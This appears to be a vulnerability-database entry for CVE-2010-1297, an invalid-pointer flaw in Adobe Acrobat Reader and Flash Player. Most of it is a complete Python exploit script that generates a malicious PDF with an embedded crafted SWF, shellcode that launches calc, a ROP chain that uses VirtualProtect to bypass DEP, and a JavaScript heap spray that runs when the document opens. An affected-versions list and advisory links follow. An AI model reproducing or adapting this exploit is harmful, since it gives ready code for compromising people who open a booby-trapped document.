''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 1 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz) Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability Analysis : http://www.abysssec.com Vendor : http://www.adobe.com Impact : Ciritical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1297 MOAUB Number : MOAUB-01-BA ''' import sys class PDF: def __init__(self): self.xrefs = [] self.eol = '\x0a' self.content = '' self.xrefs_offset = 0 def header(self): self.content += '%PDF-1.6' + self.eol def obj(self, obj_num, data,flag): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num if flag == 1: self.content += self.eol + '<< ' + data + ' >>' + self.eol else: self.content += self.eol + data + self.eol self.content += 'endobj' + self.eol def obj_SWFStream(self, obj_num, data, stream): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream)) self.content += ' >>' + self.eol self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol self.content += 'endobj' + self.eol def obj_Stream(self, obj_num, data, stream): self.xrefs.append(len(self.content)) self.content += '%d 0 obj' % obj_num self.content += self.eol + '<< ' + data + '/Length %d' %len(stream) self.content += ' >>' + self.eol self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol self.content += 'endobj' + self.eol def ref(self, ref_num): return '%d 0 R' % ref_num def xref(self): self.xrefs_offset = len(self.content) self.content += 'xref' + self.eol self.content += '0 %d' % (len(self.xrefs) + 1) self.content += self.eol self.content += '0000000000 65535 f' + self.eol for i in self.xrefs: self.content += '%010d 00000 n' % i self.content += self.eol def trailer(self): self.content += 'trailer' + self.eol self.content += '<< /Size %d' % (len(self.xrefs) + 1) self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol self.content += 'startxref' + self.eol self.content += '%d' % self.xrefs_offset self.content += self.eol self.content += '%%EOF' def generate(self): return self.content class Exploit: def convert_to_utf16(self, payload): enc_payload = '' for i in range(0, len(payload), 2): num = 0 for j in range(0, 2): num += (ord(payload[i + j]) & 0xff) << (j * 8) enc_payload += '%%u%04x' % num return enc_payload def get_payload(self): # shellcode calc.exe payload =("\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" "\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C" "\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C" "\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52" "\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44" "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54" "\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45" "\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F" "\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50" "\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C" "\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41") return payload def getSWF(self): try: #swfFile = sys.argv[2] fdR = open('flash.swf', 'rb+') strTotal = fdR.read() str1 = strTotal[:88] addr1 = '\x06\xa6\x17\x30' # addr = 0c0c0c0c str2 = strTotal[92:533] #*************************** Bypass DEP by VirtualProtect ******************************** rop = '' rop += "\x77\xFA\x44\x7E" # mov edi,esp ret 4 rop += "\x94\x28\xc2\x77" #add esp,20 pop ebp ret rop += "AAAA" #padding rop += "\xD4\x1A\x80\x7C" # VirtualProtect rop += "BBBB" # Ret Addr for VirtualProtect rop += "CCCC" # Param1 (lpAddress) rop += "DDDD" # Param2 (Size) rop += "EEEE" # Param3 (flNewProtect) rop += "\x10\xB0\xEF\x77" # Param4 (Writable Address) rop += "AAAAAAAAAAAA" #padding rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret rop += "AAAA" #padding rop += "\xF2\xE1\x12\x06" #add eax,94 ret rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4 rop += "\x16\x9A\x94\x7C" #mov [ebp-30],eax ret rop += "AAAA" #padding rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret rop += "AAAA" #padding rop += "\xF2\xE1\x12\x06" #add eax,94 ret rop += "\x79\x9E\x83\x7C" #mov [ebp-2c],eax ret rop += "\x27\x56\xEA\x77" #mov eax,6b3 ret rop += "\x14\x83\xE0\x77" #mov [ebp-28],eax ret rop += "\xB4\x01\xF2\x77" #xor eax,eax ret rop += "\x88\x41\x97\x7C" #add eax,40 pop ebp ret rop += "AAAA" #padding rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4 rop += "\xC0\x9E\xEF\x77" #mov [ebp-54],eax ret rop += "AAAA" #padding rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret rop += "AAAA" #padding rop += "\xC1\xF2\xC1\x77" #add eax,8 ret rop += "\xCF\x97\xDE\x77" #xchg eax,esp ret str3 = strTotal[669:1249] alignESP = "\x83\xc4\x03" sc = self.get_payload() if len(sc) > 2118: print "[*] Error : payload length is long" return if len(sc) <= 2118: dif = 2118 - len(sc) while dif > 0 : sc += '\x90' dif = dif - 1 str4 = strTotal[3370:3726] addr2 = '\xF2\x3D\x8D\x23' # Enter 0C75 , 81 RET str5 = strTotal[3730:] fdW= open('exploit.swf', 'wb+') finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5 fdW.write(finalStr) #strTotal = open('exploit.swf', 'rb+').read() fdW.close() fdR.close() return finalStr except IOError: print '[*] Error : An IO error has occurred' def HeapSpray(self): spray = ''' function spray_heap() { var chunk_size, payload, nopsled; chunk_size = 0x1A0000; pointers = unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030"); pointerSled = unescape("<Contents>"); while (pointerSled.length < chunk_size) pointerSled += pointerSled; pointerSled_len = chunk_size - (pointers.length + 20); pointerSled = pointerSled.substring(0, pointerSled_len); heap_chunks = new Array(); for (var i = 0 ; i < <CHUNKS> ; i++) heap_chunks[i] = pointerSled + pointers; } spray_heap(); ''' spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX ''' Authplay.dll 303033DD ? 87DC XCHG ESP,EBX ############################################################# will do nothing 303033DF ? 45 INC EBP 303033E0 ? 05 00898784 ADD EAX,84878900 303033E5 ? 42 INC EDX 303033E6 ? 05 008987E8 ADD EAX,E8878900 303033EB ? 41 INC ECX 303033EC ? 05 008987EC ADD EAX,EC878900 303033F1 ? 41 INC ECX 303033F2 ? 05 008987F0 ADD EAX,F0878900 303033F7 ? 41 INC ECX 303033F8 ? 05 008987F4 ADD EAX,F4878900 303033FD ? 41 INC ECX 303033FE ? 05 005F5E5D ADD EAX,5D5E5F00 30303403 . B8 01000000 MOV EAX,1 30303408 . 5B POP EBX ############################################################ 30303409 . 83C4 30 ADD ESP,30 3030340C . C3 RETN ''' spray = spray.replace('<CHUNKS>', '40') #Chunk count return spray def generate_pdf(): exploit = Exploit() swfFile = 'exploit.swf' pdf = PDF() pdf.header() pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1) #pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1) pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1) pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1) pdf.obj_Stream(4, '','') pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1) pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1) pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1) pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1) pdf.obj_Stream(16, '<</Length 0 >> ','') pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) pdf.xref() pdf.trailer() return pdf.generate() def main(): if len(sys.argv) != 2: print 'Usage: python %s [output file name]' % sys.argv[0] sys.exit(0) file_name = sys.argv[1] if not file_name.endswith('.pdf'): file_name = file_name + '.pdf' try: fd = open(file_name, 'wb+') fd.write(generate_pdf()) fd.close() print '[-] PDF file generated and written to %s' % file_name except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main()

Products Mentioned

Configuraton 0

Adobe>>Air >> Version To (excluding) 2.0.2.12610

Adobe>>Flash_player >> Version To (excluding) 9.0.277.0

Adobe>>Flash_player >> Version From (including) 10.0 To (excluding) 10.1.53.64

Configuraton 0

Adobe>>Acrobat >> Version From (including) 8.0 To (excluding) 8.2.3

Adobe>>Acrobat >> Version From (including) 9.0 To (excluding) 9.3.3

Apple>>Mac_os_x >> Version -

Microsoft>>Windows >> Version -

Configuraton 0

Opensuse>>Opensuse >> Version From (including) 11.0 To (including) 11.2

Suse>>Linux_enterprise >> Version 10.0

Suse>>Linux_enterprise >> Version 11.0

Suse>>Linux_enterprise >> Version 11.0

References

http://www.vupen.com/english/advisories/2010/1636
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/1349
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2011/0192
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2010/1421
Tags : vdb-entry, x_refsource_VUPEN
http://support.apple.com/kb/HT4435
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/40545
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0464.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/1793
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/43026
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1432
Tags : vdb-entry, x_refsource_VUPEN
http://security.gentoo.org/glsa/glsa-201101-09.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.us-cert.gov/cas/techalerts/TA10-162A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.kb.cert.org/vuls/id/486225
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/40759
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1024085
Tags : vdb-entry, x_refsource_SECTRACK
http://securitytracker.com/id?1024057
Tags : vdb-entry, x_refsource_SECTRACK
http://securitytracker.com/id?1024086
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/40034
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1434
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/40586
Tags : vdb-entry, x_refsource_BID
http://www.turbolinux.co.jp/security/2010/TLSA-2010-19j.txt
Tags : vendor-advisory, x_refsource_TURBO
http://securitytracker.com/id?1024058
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2010/1348
Tags : vdb-entry, x_refsource_VUPEN
http://www.exploit-db.com/exploits/13787
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.us-cert.gov/cas/techalerts/TA10-159A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/40144
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2010-0470.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2010/1482
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/40026
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2010/1522
Tags : vdb-entry, x_refsource_VUPEN
http://www.osvdb.org/65141
Tags : vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2010/1453
Tags : vdb-entry, x_refsource_VUPEN